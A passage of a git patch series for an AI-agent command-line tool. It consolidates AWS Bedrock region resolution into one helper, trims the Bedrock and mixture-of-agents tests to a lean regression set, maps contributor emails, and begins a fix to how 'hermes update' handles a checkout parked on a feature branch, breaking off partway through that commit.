single region chokepoint MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Follow-up structural pass on the review fix: - Runtime provider, auxiliary resolution, model validation (hermes_cli/models.py), live discovery (bedrock_model_ids_or_none), and the Mantle URL/SigV4 fallbacks all resolve their region through resolve_bedrock_runtime_region() — one canonical implementation of the config-first priority instead of three hand-rolled copies. - agent_init: drop the 'if "client_kwargs" in locals()' guard by initializing client_kwargs unconditionally at the top of the else branch; the Mantle kwargs hook is a documented no-op for non-Mantle base URLs. --- agent/agent_init.py | 22 +++++++++++----------- agent/bedrock_adapter.py | 8 ++++---- hermes_cli/models.py | 4 ++-- hermes_cli/runtime_provider.py | 8 ++++---- 4 files changed, 21 insertions(+), 21 deletions(-) diff --git a/agent/agent_init.py b/agent/agent_init.py index 88b4d1caf7..9b77d5227f 100644 --- a/agent/agent_init.py +++ b/agent/agent_init.py @@ -1431,19 +1431,19 @@ def init_agent( "select a provider, or run `hermes setup` for first-time " "configuration." ) - # Bedrock GPT-5.5 uses Bedrock Mantle's OpenAI Responses endpoint. + # Bedrock GPT-5.5/5.6 use Bedrock Mantle's OpenAI Responses endpoint. # Runtime resolution uses api_key="aws-sdk" as the IAM-auth sentinel; # attach an httpx client that SigV4-signs every OpenAI SDK request. - if "client_kwargs" in locals(): - try: - from agent.bedrock_adapter import configure_bedrock_openai_client_kwargs - configure_bedrock_openai_client_kwargs( - client_kwargs, - timeout=_provider_timeout, - ) - except Exception: - if agent.provider == "bedrock" and "bedrock-mantle." in str(client_kwargs.get("base_url", "")): - raise + # No-op for non-Mantle base URLs. + try: + from agent.bedrock_adapter import configure_bedrock_openai_client_kwargs + configure_bedrock_openai_client_kwargs( + client_kwargs, + timeout=_provider_timeout, + ) + except Exception: + if agent.provider == "bedrock" and "bedrock-mantle." in str(client_kwargs.get("base_url", "")): + raise agent._client_kwargs = client_kwargs # stored for rebuilding after interrupt diff --git a/agent/bedrock_adapter.py b/agent/bedrock_adapter.py index d39767fcc4..5e2c082080 100644 --- a/agent/bedrock_adapter.py +++ b/agent/bedrock_adapter.py @@ -189,7 +189,7 @@ def merge_bedrock_openai_model_ids(model_ids: List[str]) -> List[str]: def bedrock_openai_base_url(region: str) -> str: """Return Bedrock Mantle's OpenAI-compatible base URL for *region*.""" - resolved = (region or "").strip() or resolve_bedrock_region() + resolved = (region or "").strip() or resolve_bedrock_runtime_region() return f"https://bedrock-mantle.{resolved}.api.aws/openai/v1" @@ -224,7 +224,7 @@ class BedrockOpenAISigV4Auth(httpx.Auth): requires_request_body = True def __init__(self, region: str, service: str = "bedrock"): - self.region = (region or "").strip() or resolve_bedrock_region() + self.region = (region or "").strip() or resolve_bedrock_runtime_region() self.service = service def auth_flow(self, request): # pragma: no cover - exercised by live call @@ -286,7 +286,7 @@ def configure_bedrock_openai_client_kwargs( api_key = client_kwargs.get("api_key") if isinstance(api_key, str) and api_key.strip() and api_key not in {"aws-sdk", "no-key-required"}: return client_kwargs - region = bedrock_openai_region_from_base_url(base_url) or resolve_bedrock_region() + region = bedrock_openai_region_from_base_url(base_url) or resolve_bedrock_runtime_region() client_kwargs["api_key"] = "aws-sdk" client_kwargs["http_client"] = build_bedrock_openai_http_client(region, timeout=timeout) return client_kwargs @@ -585,7 +585,7 @@ def bedrock_model_ids_or_none() -> Optional[List[str]]: ``list_authenticated_providers`` section 2, and section 3. """ try: - discovered = discover_bedrock_models(resolve_bedrock_region()) + discovered = discover_bedrock_models(resolve_bedrock_runtime_region()) if discovered: return merge_bedrock_openai_model_ids([m["id"] for m in discovered]) except Exception: diff --git a/hermes_cli/models.py b/hermes_cli/models.py index 16032fba27..0486c25fbc 100644 --- a/hermes_cli/models.py +++ b/hermes_cli/models.py @@ -6808,8 +6808,8 @@ def validate_requested_model( # AWS SDK control plane (ListFoundationModels + ListInferenceProfiles). if normalized == "bedrock": try: - from agent.bedrock_adapter import discover_bedrock_models, resolve_bedrock_region - region = resolve_bedrock_region() + from agent.bedrock_adapter import discover_bedrock_models, resolve_bedrock_runtime_region + region = resolve_bedrock_runtime_region() discovered = discover_bedrock_models(region) discovered_ids = {m["id"] for m in discovered} if requested in discovered_ids: diff --git a/hermes_cli/runtime_provider.py b/hermes_cli/runtime_provider.py index 2058f9d642..da4aab108d 100644 --- a/hermes_cli/runtime_provider.py +++ b/hermes_cli/runtime_provider.py @@ -2235,7 +2235,7 @@ def resolve_runtime_provider( from agent.bedrock_adapter import ( has_aws_credentials, resolve_aws_auth_env_var, - resolve_bedrock_region, + resolve_bedrock_runtime_region, is_anthropic_bedrock_model, is_openai_bedrock_model, bedrock_openai_base_url, @@ -2258,9 +2258,9 @@ def resolve_runtime_provider( # Read bedrock-specific config from config.yaml _bedrock_cfg = load_config().get("bedrock", {}) # Region priority: config.yaml bedrock.region → env var → us-east-1. - # Same resolution as resolve_bedrock_runtime_region() in - # agent/bedrock_adapter.py — auxiliary calls must agree with this. - region = (_bedrock_cfg.get("region") or "").strip() or resolve_bedrock_region() + # resolve_bedrock_runtime_region() is the canonical implementation of + # this priority; auxiliary resolution uses the same helper. + region = resolve_bedrock_runtime_region({"bedrock": _bedrock_cfg}) auth_source = resolve_aws_auth_env_var() or "aws-sdk-default-chain" # Build guardrail config if configured _gr = _bedrock_cfg.get("guardrail", {}) From 42dd219f46f19e1dc07a34012d088de6297e5cbb Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 14:47:53 -0700 Subject: [PATCH 064/161] test: trim salvage of #65076 to a lean regression set Drop the bulk test additions from the original PR; keep only mandatory picker-assertion adaptations (Mantle IDs join the discovery lists), one allowlist routing test covering all four Mantle model IDs, the 272K context check, and the two review-mandated auxiliary regressions (config-region-beats-env for the Mantle path, aux Responses client). --- tests/agent/test_bedrock_integration.py | 253 ++++-------------- tests/hermes_cli/test_bedrock_model_picker.py | 88 ------ tests/run_agent/test_moa_loop_mode.py | 50 ---- 3 files changed, 59 insertions(+), 332 deletions(-) diff --git a/tests/agent/test_bedrock_integration.py b/tests/agent/test_bedrock_integration.py index 890f51fe2b..c8fc15d3b7 100644 --- a/tests/agent/test_bedrock_integration.py +++ b/tests/agent/test_bedrock_integration.py @@ -69,34 +69,6 @@ class TestModelCatalog: nova_models = [m for m in models if "amazon.nova" in m] assert len(nova_models) > 0 - def test_bedrock_models_include_openai_gpt55(self): - """Bedrock GPT-5.5 is served by the OpenAI Responses-compatible - Bedrock Mantle endpoint, so it must be surfaced even though it is not - returned by the Converse/ListFoundationModels discovery path.""" - from hermes_cli.models import _PROVIDER_MODELS - models = _PROVIDER_MODELS.get("bedrock", []) - assert "openai.gpt-5.5" in models - - def test_bedrock_models_include_openai_gpt56_family(self): - """The GPT-5.6 family (Sol/Terra/Luna, GA 2026-07-13) is Mantle-only - like GPT-5.5 and must be surfaced in the static Bedrock list.""" - from hermes_cli.models import _PROVIDER_MODELS - models = _PROVIDER_MODELS.get("bedrock", []) - for model_id in ("openai.gpt-5.6-sol", "openai.gpt-5.6-terra", "openai.gpt-5.6-luna"): - assert model_id in models - - def test_bedrock_openai_context_length_is_272k(self): - """AWS model cards list a 272K context window for the GPT-5.5/5.6 - Mantle models; make sure we do not fall back to the 128K default.""" - from agent.bedrock_adapter import get_bedrock_context_length - for model_id in ( - "openai.gpt-5.5", - "openai.gpt-5.6-sol", - "openai.gpt-5.6-terra", - "openai.gpt-5.6-luna", - ): - assert get_bedrock_context_length(model_id) == 272_000 - class TestResolveProvider: """Verify resolve_provider() handles bedrock correctly.""" @@ -179,40 +151,22 @@ class TestRuntimeProvider: assert result["provider"] == "bedrock" assert result["api_mode"] == "bedrock_converse" - def test_bedrock_openai_gpt55_routes_to_mantle_responses(self, monkeypatch): - """OpenAI GPT-5.5 on Bedrock is not a Converse model: route it to - bedrock-mantle's OpenAI Responses surface with IAM/AWS SDK auth.""" + def test_bedrock_openai_models_route_to_mantle_responses(self, monkeypatch): + """Bedrock's OpenAI models (GPT-5.5 / GPT-5.6 family) are not Converse + models — they only answer on the Mantle /openai/v1 Responses surface. + Every allowlisted ID must route there, with the aws-sdk IAM sentinel.""" + from agent.bedrock_adapter import BEDROCK_OPENAI_RESPONSES_MODEL_IDS from hermes_cli.runtime_provider import resolve_runtime_provider monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIOSFODNN7EXAMPLE") monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY") monkeypatch.setenv("AWS_REGION", "us-east-2") - with patch("hermes_cli.runtime_provider.resolve_provider", return_value="bedrock"), \ - patch("hermes_cli.runtime_provider._get_model_config", return_value={ - "provider": "bedrock", - "default": "openai.gpt-5.5", - }): - result = resolve_runtime_provider(requested="bedrock") + assert "openai.gpt-5.5" in BEDROCK_OPENAI_RESPONSES_MODEL_IDS + for suffix in ("sol", "terra", "luna"): + assert f"openai.gpt-5.6-{suffix}" in BEDROCK_OPENAI_RESPONSES_MODEL_IDS - assert result["provider"] == "bedrock" - assert result["api_mode"] == "codex_responses" - assert result["model"] == "openai.gpt-5.5" - assert result["region"] == "us-east-2" - assert result["base_url"] == "https://bedrock-mantle.us-east-2.api.aws/openai/v1" - assert result["api_key"] == "aws-sdk" - assert result["bedrock_openai"] is True - - def test_bedrock_openai_gpt56_family_routes_to_mantle_responses(self, monkeypatch): - """Every GPT-5.6 variant (Sol/Terra/Luna) must take the same Mantle - Responses route as GPT-5.5 — none of them are Converse models.""" - from hermes_cli.runtime_provider import resolve_runtime_provider - - monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIOSFODNN7EXAMPLE") - monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY") - monkeypatch.setenv("AWS_REGION", "us-east-2") - - for model_id in ("openai.gpt-5.6-sol", "openai.gpt-5.6-terra", "openai.gpt-5.6-luna"): + for model_id in BEDROCK_OPENAI_RESPONSES_MODEL_IDS: with patch("hermes_cli.runtime_provider.resolve_provider", return_value="bedrock"), \ patch("hermes_cli.runtime_provider._get_model_config", return_value={ "provider": "bedrock", @@ -223,8 +177,19 @@ class TestRuntimeProvider: assert result["api_mode"] == "codex_responses", model_id assert result["model"] == model_id assert result["base_url"] == "https://bedrock-mantle.us-east-2.api.aws/openai/v1" + assert result["api_key"] == "aws-sdk" assert result["bedrock_openai"] is True, model_id + def test_bedrock_openai_context_length_is_272k(self): + """AWS model cards list a 272K context window for the Mantle OpenAI + models; make sure we do not fall back to the 128K default.""" + from agent.bedrock_adapter import ( + BEDROCK_OPENAI_RESPONSES_MODEL_IDS, + get_bedrock_context_length, + ) + for model_id in BEDROCK_OPENAI_RESPONSES_MODEL_IDS: + assert get_bedrock_context_length(model_id) == 272_000 + # --------------------------------------------------------------------------- # providers.py integration @@ -472,88 +437,8 @@ class TestAuxiliaryClientBedrockResolution: assert client is None assert model is None - def test_bedrock_config_region_beats_env_region(self, monkeypatch): - """bedrock.region in config.yaml must win over AWS_REGION for auxiliary - calls — the same priority the main runtime resolver uses. - Regression for the #65076 review: auxiliary resolution derived its - region with bare resolve_bedrock_region() (env-first), so when - config.yaml pinned bedrock.region to a different region than the - ambient AWS env, auxiliary calls (compression, memory, vision) left - the primary runtime's region. - """ - monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIOSFODNN7EXAMPLE") - monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY") - monkeypatch.setenv("AWS_REGION", "eu-central-1") - with patch("hermes_cli.config.load_config_readonly", - return_value={"bedrock": {"region": "us-west-2"}}), \ - patch("agent.anthropic_adapter.build_anthropic_bedrock_client", - return_value=MagicMock()): - from agent.auxiliary_client import resolve_provider_client - client, _ = resolve_provider_client("bedrock", None) - - assert client is not None - assert "us-west-2" in client.base_url, ( - "auxiliary Bedrock client ignored config.yaml bedrock.region — " - "it must match the main runtime's region priority" - ) - - def test_bedrock_mantle_config_region_beats_env_region(self, monkeypatch): - """Same config-over-env priority for the Mantle (OpenAI Responses) path.""" - monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIOSFODNN7EXAMPLE") - monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY") - monkeypatch.setenv("AWS_REGION", "eu-central-1") - monkeypatch.setenv("AWS_BEARER_TOKEN_BEDROCK", "test-bearer") - - captured = {} - - class _FakeOpenAI: - def __init__(self, **kwargs): - captured.update(kwargs) - self.api_key = kwargs.get("api_key") - self.base_url = kwargs.get("base_url") - - def close(self): - pass - - with patch("hermes_cli.config.load_config_readonly", - return_value={"bedrock": {"region": "us-west-2"}}), \ - patch("agent.auxiliary_client.OpenAI", _FakeOpenAI): - from agent.auxiliary_client import resolve_provider_client - client, model = resolve_provider_client("bedrock", "openai.gpt-5.6-sol") - - assert client is not None - assert "us-west-2" in captured.get("base_url", ""), ( - "Mantle auxiliary base_url ignored config.yaml bedrock.region" - ) - - def test_bedrock_respects_explicit_model(self, monkeypatch): - """When caller passes an explicit model, it should be used.""" - monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIOSFODNN7EXAMPLE") - monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY") - - with patch("agent.anthropic_adapter.build_anthropic_bedrock_client", - return_value=MagicMock()): - from agent.auxiliary_client import resolve_provider_client - _, model = resolve_provider_client( - "bedrock", "us.anthropic.claude-sonnet-4-5-20250929-v1:0" - ) - - assert "claude-sonnet" in model - - def test_bedrock_async_mode(self, monkeypatch): - """Async mode should return an AsyncAnthropicAuxiliaryClient.""" - monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIOSFODNN7EXAMPLE") - monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY") - - with patch("agent.anthropic_adapter.build_anthropic_bedrock_client", - return_value=MagicMock()): - from agent.auxiliary_client import resolve_provider_client, AsyncAnthropicAuxiliaryClient - client, model = resolve_provider_client("bedrock", None, async_mode=True) - - assert client is not None - assert isinstance(client, AsyncAnthropicAuxiliaryClient) def test_bedrock_default_model_is_haiku(self, monkeypatch): """Default auxiliary model for Bedrock should be Haiku (fast, cheap).""" @@ -570,61 +455,11 @@ class TestAuxiliaryClientBedrockResolution: - def test_bedrock_claude_model_still_uses_anthropic_client(self, monkeypatch): - """Claude Bedrock IDs should keep the Anthropic SDK auxiliary path.""" - monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIOSFODNN7EXAMPLE") - monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY") - - mock_anthropic_bedrock = MagicMock() - with patch("agent.anthropic_adapter.build_anthropic_bedrock_client", - return_value=mock_anthropic_bedrock): - from agent.auxiliary_client import ( - AnthropicAuxiliaryClient, - resolve_provider_client, - ) - client, model = resolve_provider_client( - "bedrock", "us.anthropic.claude-sonnet-4-5-20250929-v1:0" - ) - - assert isinstance(client, AnthropicAuxiliaryClient) - assert "claude-sonnet" in model - - def test_bedrock_non_claude_async_mode(self, monkeypatch): - """Async mode for non-Claude Bedrock should return AsyncBedrockAuxiliaryClient.""" - monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIOSFODNN7EXAMPLE") - monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY") - - with patch("agent.anthropic_adapter.build_anthropic_bedrock_client"): - from agent.auxiliary_client import ( - AsyncBedrockAuxiliaryClient, - resolve_provider_client, - ) - client, _ = resolve_provider_client( - "bedrock", "openai.gpt-oss-20b-1:0", async_mode=True - ) - - assert isinstance(client, AsyncBedrockAuxiliaryClient) - - def test_bedrock_converse_shim_normalizes_string_stop(self, monkeypatch): - """OpenAI callers may pass stop='STR'; Converse requires a list.""" - monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIOSFODNN7EXAMPLE") - monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY") - - from agent.auxiliary_client import BedrockAuxiliaryClient - - client = BedrockAuxiliaryClient("us-east-1", "openai.gpt-oss-20b-1:0") - with patch("agent.bedrock_adapter.call_converse") as mock_converse: - client.chat.completions.create( - model="openai.gpt-oss-20b-1:0", - messages=[{"role": "user", "content": "hi"}], - stop="STOP", - ) - assert mock_converse.call_args.kwargs["stop_sequences"] == ["STOP"] def test_bedrock_converse_shim_stream_returns_complete_response(self, monkeypatch): """stream=True is not supported by the shim — a complete response comes back and call_llm's streaming consumer downgrades gracefully.""" - monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIOSFODNN7EXAMPLE") + monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIO...MPLE") monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY") from agent.auxiliary_client import BedrockAuxiliaryClient @@ -677,18 +512,48 @@ class TestAuxiliaryClientBedrockResolution: ) wire_kwargs = boto3_client.converse.call_args.kwargs assert wire_kwargs["inferenceConfig"]["maxTokens"] == 1234 - def test_bedrock_openai_gpt55_aux_uses_responses_client(self, monkeypatch): - """Auxiliary tasks on Bedrock GPT-5.5 should use the same Mantle - Responses path, not the AnthropicBedrock shim.""" + + def test_bedrock_mantle_config_region_beats_env_region(self, monkeypatch): + """bedrock.region in config.yaml must win over AWS_REGION for auxiliary + Mantle calls — the same priority the main runtime resolver uses (#65076 + review: aux resolution previously derived its region env-first and + could leave the primary runtime's configured region).""" + monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIOSFODNN7EXAMPLE") + monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY") + monkeypatch.setenv("AWS_REGION", "eu-central-1") + monkeypatch.setenv("AWS_BEARER_TOKEN_BEDROCK", "test-bearer") + + captured = {} + + class _FakeOpenAI: + def __init__(self, **kwargs): + captured.update(kwargs) + self.api_key = kwargs.get("api_key") + self.base_url = kwargs.get("base_url") + + def close(self): + pass + + with patch("hermes_cli.config.load_config_readonly", + return_value={"bedrock": {"region": "us-west-2"}}), \ + patch("agent.auxiliary_client.OpenAI", _FakeOpenAI): + from agent.auxiliary_client import resolve_provider_client + client, model = resolve_provider_client("bedrock", "openai.gpt-5.6-sol") + + assert client is not None + assert model == "openai.gpt-5.6-sol" + assert "us-west-2" in captured.get("base_url", ""), ( + "Mantle auxiliary base_url ignored config.yaml bedrock.region" + ) + + def test_bedrock_openai_aux_uses_responses_client(self, monkeypatch): + """Auxiliary tasks on Bedrock GPT models use the Mantle Responses + path (SigV4 http client + aws-sdk sentinel), not the Anthropic shim.""" monkeypatch.setenv("AWS_ACCESS_KEY_ID", "AKIAIOSFODNN7EXAMPLE") monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY") monkeypatch.setenv("AWS_REGION", "us-east-2") - fake_openai_client = MagicMock() - fake_openai_client.api_key = "aws-sdk" - fake_openai_client.base_url = "https://bedrock-mantle.us-east-2.api.aws/openai/v1" - - with patch("agent.auxiliary_client.OpenAI", return_value=fake_openai_client) as mock_openai, \ + with patch("agent.auxiliary_client.OpenAI", return_value=MagicMock()) as mock_openai, \ patch("agent.bedrock_adapter.build_bedrock_openai_http_client", return_value=MagicMock()): from agent.auxiliary_client import resolve_provider_client, CodexAuxiliaryClient client, model = resolve_provider_client("bedrock", "openai.gpt-5.5") diff --git a/tests/hermes_cli/test_bedrock_model_picker.py b/tests/hermes_cli/test_bedrock_model_picker.py index 7d8024bad0..8022ea9ec6 100644 --- a/tests/hermes_cli/test_bedrock_model_picker.py +++ b/tests/hermes_cli/test_bedrock_model_picker.py @@ -94,34 +94,10 @@ class TestProviderModelIdsBedrock: assert all(m.startswith("eu.") or m.lower() in _MANTLE_SET for m in eu_result) assert all(m.startswith("us.") or m.lower() in _MANTLE_SET for m in us_result) - for _m in _MANTLE_MODELS: - assert _m in eu_result - assert _m in us_result assert eu_result != us_result - def test_falls_back_to_static_list_on_exception(self, monkeypatch): - """When discover_bedrock_models() raises, fall back gracefully.""" - from hermes_cli.models import provider_model_ids - with patch("agent.bedrock_adapter.discover_bedrock_models", - side_effect=Exception("boto3 not installed")), \ - patch("agent.bedrock_adapter.resolve_bedrock_region", return_value="eu-central-1"): - result = provider_model_ids("bedrock") - assert isinstance(result, list) # no crash - - def test_accepts_bedrock_aliases(self, monkeypatch): - """Provider aliases (aws, aws-bedrock, amazon) should also trigger live discovery.""" - from hermes_cli.models import provider_model_ids - - _expected_ids = [m["id"] for m in _US_MODELS] - - with patch("agent.bedrock_adapter.discover_bedrock_models", side_effect=_mock_discover), \ - patch("agent.bedrock_adapter.resolve_bedrock_region", return_value="us-east-1"): - for alias in ("aws", "aws-bedrock", "amazon-bedrock"): - result = provider_model_ids(alias) - assert result == _expected_ids + _MANTLE_MODELS, \ - f"alias {alias!r} should return live-discovered US model IDs, got {result!r}" # --------------------------------------------------------------------------- @@ -131,56 +107,9 @@ class TestProviderModelIdsBedrock: class TestListAuthenticatedProvidersBedrock: """Bedrock should appear in the /model picker when AWS creds are present.""" - def test_bedrock_uses_live_discovery_not_static_list(self, monkeypatch): - """Model IDs come from discover_bedrock_models(), not the static _PROVIDER_MODELS table.""" - from hermes_cli.model_switch import list_authenticated_providers - monkeypatch.setenv("AWS_PROFILE", "my-sso-profile") - with patch("agent.bedrock_adapter.has_aws_credentials", return_value=True), \ - patch("agent.bedrock_adapter.discover_bedrock_models", side_effect=_mock_discover), \ - patch("agent.bedrock_adapter.resolve_bedrock_region", return_value="eu-central-1"): - providers = list_authenticated_providers(current_provider="bedrock") - bedrock = next((p for p in providers if p["slug"] == "bedrock"), None) - assert bedrock is not None - - # All returned model IDs should have eu.* prefix — live discovery result - for _m in _MANTLE_MODELS: - assert _m in bedrock["models"] - for model_id in bedrock["models"]: - assert model_id.startswith("eu.") or model_id.lower() in _MANTLE_SET, \ - f"Expected eu.* or Bedrock OpenAI model ID from live discovery, got {model_id!r}" - - def test_bedrock_total_models_matches_discovery(self, monkeypatch): - """total_models reflects the actual discovered count.""" - from hermes_cli.model_switch import list_authenticated_providers - - monkeypatch.setenv("AWS_PROFILE", "my-sso-profile") - - with patch("agent.bedrock_adapter.has_aws_credentials", return_value=True), \ - patch("agent.bedrock_adapter.discover_bedrock_models", return_value=_EU_MODELS), \ - patch("agent.bedrock_adapter.resolve_bedrock_region", return_value="eu-central-1"): - providers = list_authenticated_providers(current_provider="openai") - - bedrock = next((p for p in providers if p["slug"] == "bedrock"), None) - assert bedrock is not None - assert bedrock["total_models"] == len(_EU_MODELS) + len(_MANTLE_MODELS) - - def test_bedrock_is_current_when_selected(self, monkeypatch): - """is_current=True when current_provider matches bedrock.""" - from hermes_cli.model_switch import list_authenticated_providers - - monkeypatch.setenv("AWS_PROFILE", "my-sso-profile") - - with patch("agent.bedrock_adapter.has_aws_credentials", return_value=True), \ - patch("agent.bedrock_adapter.discover_bedrock_models", return_value=_EU_MODELS), \ - patch("agent.bedrock_adapter.resolve_bedrock_region", return_value="eu-central-1"): - providers = list_authenticated_providers(current_provider="bedrock") - - bedrock = next((p for p in providers if p["slug"] == "bedrock"), None) - assert bedrock is not None - assert bedrock["is_current"] is True def test_bedrock_not_shown_without_credentials(self, monkeypatch): """Bedrock must not appear when no AWS credentials are present.""" @@ -252,23 +181,6 @@ class TestBedrockRegionRouting: assert model_id.startswith("eu.") or model_id.lower() in _MANTLE_SET, \ f"Expected eu.* or Bedrock OpenAI model ID from eu-central-1 profile, got {model_id!r}" - def test_us_region_from_env_var_yields_us_models(self, monkeypatch): - """Explicit AWS_REGION=us-east-1 returns us.* model IDs.""" - from hermes_cli.model_switch import list_authenticated_providers - - monkeypatch.setenv("AWS_REGION", "us-east-1") - - with patch("agent.bedrock_adapter.has_aws_credentials", return_value=True), \ - patch("agent.bedrock_adapter.discover_bedrock_models", side_effect=_mock_discover): - providers = list_authenticated_providers(current_provider="bedrock") - - bedrock = next((p for p in providers if p["slug"] == "bedrock"), None) - assert bedrock is not None - for _m in _MANTLE_MODELS: - assert _m in bedrock["models"] - for model_id in bedrock["models"]: - assert model_id.startswith("us.") or model_id.lower() in _MANTLE_SET, \ - f"Expected us.* or Bedrock OpenAI model ID from us-east-1, got {model_id!r}" def test_env_var_takes_priority_over_botocore_profile(self, monkeypatch): """AWS_REGION env var wins over botocore profile region.""" diff --git a/tests/run_agent/test_moa_loop_mode.py b/tests/run_agent/test_moa_loop_mode.py index 2d45b68838..e7c0f9facb 100644 --- a/tests/run_agent/test_moa_loop_mode.py +++ b/tests/run_agent/test_moa_loop_mode.py @@ -412,56 +412,6 @@ def test_retry_same_provider_sync_preserves_extra_headers(monkeypatch): assert captured.get("extra_headers") == {"x-initiator": "user"} -def test_moa_bedrock_slot_preserves_provider_identity(monkeypatch): - """Bedrock slots must stay on the aws_sdk provider branch. - - Bedrock OpenAI models (GPT-5.5/5.6) resolve to Bedrock Mantle's OpenAI - Responses endpoint with api_key="aws-sdk" as an IAM sentinel. - _slot_runtime forwards the resolved base_url/api_key unconditionally; the - chokepoint that must NOT collapse bedrock to provider=custom is - _resolve_task_provider_model (via _preserve_provider_with_base_url). If it - collapsed, call_llm would send the "aws-sdk" sentinel as an invalid bearer - token instead of attaching the SigV4 Responses client. - """ - from agent import moa_loop - from agent.auxiliary_client import _resolve_task_provider_model - - def fake_resolve(*, requested, target_model=None): - return { - "provider": requested, - "api_mode": "codex_responses", - "model": target_model, - "base_url": "https://bedrock-mantle.us-east-2.api.aws/openai/v1", - "api_key": "aws-sdk", - "bedrock_openai": True, - } - - monkeypatch.setattr( - "hermes_cli.runtime_provider.resolve_runtime_provider", fake_resolve - ) - - rt = moa_loop._slot_runtime({"provider": "bedrock", "model": "openai.gpt-5.5"}) - # _slot_runtime forwards the resolved endpoint unconditionally now. - assert rt["provider"] == "bedrock" - assert rt["model"] == "openai.gpt-5.5" - assert rt["base_url"] == "https://bedrock-mantle.us-east-2.api.aws/openai/v1" - assert rt["api_key"] == "aws-sdk" - - # The chokepoint preserves bedrock identity despite the explicit base_url - # (api_mode is forwarded to call_llm directly, not the resolver). - resolver_kwargs = {k: v for k, v in rt.items() if k != "api_mode"} - resolved_provider, _model, base_url, _api_key, _mode = _resolve_task_provider_model( - task="moa_reference", - **resolver_kwargs, - ) - assert resolved_provider == "bedrock" - assert base_url == "https://bedrock-mantle.us-east-2.api.aws/openai/v1" - - -def test_moa_slot_runtime_falls_back_on_resolution_error(monkeypatch): - """A slot whose provider can't be resolved still attempts the call with the - bare provider/model rather than aborting the whole MoA turn.""" - from agent import moa_loop From 2dcb623956d5d2970e2918a1a3c2592da98ef1a2 Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 14:48:45 -0700 Subject: [PATCH 065/161] chore: map salvage contributor emails --- contributors/emails/nate@vulcan-tech.com | 1 + contributors/emails/vinayshah2006@gmail.com | 1 + 2 files changed, 2 insertions(+) create mode 100644 contributors/emails/nate@vulcan-tech.com create mode 100644 contributors/emails/vinayshah2006@gmail.com diff --git a/contributors/emails/nate@vulcan-tech.com b/contributors/emails/nate@vulcan-tech.com new file mode 100644 index 0000000000..d46d78360b --- /dev/null +++ b/contributors/emails/nate@vulcan-tech.com @@ -0,0 +1 @@ +natebransc diff --git a/contributors/emails/vinayshah2006@gmail.com b/contributors/emails/vinayshah2006@gmail.com new file mode 100644 index 0000000000..8bef78981c --- /dev/null +++ b/contributors/emails/vinayshah2006@gmail.com @@ -0,0 +1 @@ +vinayshah1998 From bbbc50acc23694ba1d356f467f358da3244e93de Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 13:41:25 -0700 Subject: [PATCH 066/161] fix: hermes update no longer strands non-interactive updates on a parked branch with unmerged commits MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit A clean checkout parked on a feature branch now always switches to the update target. Unmerged commits are safe on the branch (git checkout never discards committed work) and get a loud 'kept' notice naming the branch, count, and the checkout command to resume the work. Previously the update hard-skipped with exit 1 — a dead end for the desktop update button, gateway /update, and cron, which have no way to resolve a skip. Dirty trees (uncommitted changes) still skip loudly, and the updates.auto_switch_parked_branch: false opt-out still pins the branch. --- hermes_cli/config_defaults.py | 17 ++- hermes_cli/main.py | 1 + hermes_cli/update_cmd.py | 105 +++++++++++++----- .../test_update_parked_branch_guard.py | 60 ++++++++-- website/docs/getting-started/updating.md | 7 +- 5 files changed, 145 insertions(+), 45 deletions(-) diff --git a/hermes_cli/config_defaults.py b/hermes_cli/config_defaults.py index f0d96d9e0d..d47082eb12 100644 --- a/hermes_cli/config_defaults.py +++ b/hermes_cli/config_defaults.py @@ -3253,12 +3253,17 @@ DEFAULT_CONFIG = { "non_interactive_local_changes": "stash", # When `hermes update` finds the source checkout parked on a feature # branch (left behind by tooling or a manual checkout), switch back - # to the update target automatically — but only when the branch is - # clean and every commit on it is already merged into the target. - # When it is not safe, the code update is SKIPPED with a loud - # warning instead of pretending success (2026-08-17 incident: - # "✓ Code updated!" printed while the checkout 